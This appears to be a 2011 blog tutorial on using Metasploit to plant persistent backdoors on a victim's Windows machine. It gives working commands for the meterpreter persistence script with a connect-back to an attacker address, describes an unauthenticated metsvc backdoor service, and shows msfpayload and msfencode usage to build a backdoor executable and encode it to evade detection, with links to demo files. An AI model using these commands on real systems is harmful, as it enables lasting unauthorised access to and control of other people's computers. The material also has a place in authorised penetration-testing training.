Friday, June 17, 2011

Metasploit Backdoor Tutorial

Backdoor:
Create a persistent backdoor
Can be configured to connect back on system boot or user login
The interval between connect-back attempts can be set
Under the hood
    Creates a VBS file on the victim and executes it
    Adds registry entries so it runs automatically
Can be uninstalled remotely
    The VBS file must be deleted manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor
Runs as a service on the victim
Connect to it remotely
    No authentication required
Can be uninstalled remotely
    Files must be deleted manually
Less noisy compared to persistence
    The attacker can connect whenever he wants
Can be found by port scanning
Demo: Backdoor with Metsvc



Create Executable from payloads
Msfpayload
Use: msfpayload <payload> [var=val] [S]ummary|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar
Ex:
msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.100 X > bind_tcp.exe
Encoding to obfuscate the payload
Encode the payload to evade detection
Encode the payload to ensure that it will work
    Removing NULL bytes
Msfencode can be used in conjunction with msfpayload
Demo:
Create backdoor executable:




Encode backdoor:



Or:
Backdoor with metsvc: http://www.mediafire.com/?1z8zi4293w2zbnp
Create backdoor with msfpayload: http://www.mediafire.com/?w69fgypdx8f1lpp
Encode backdoor: http://www.mediafire.com/?z9jkk66gt6z4pm9
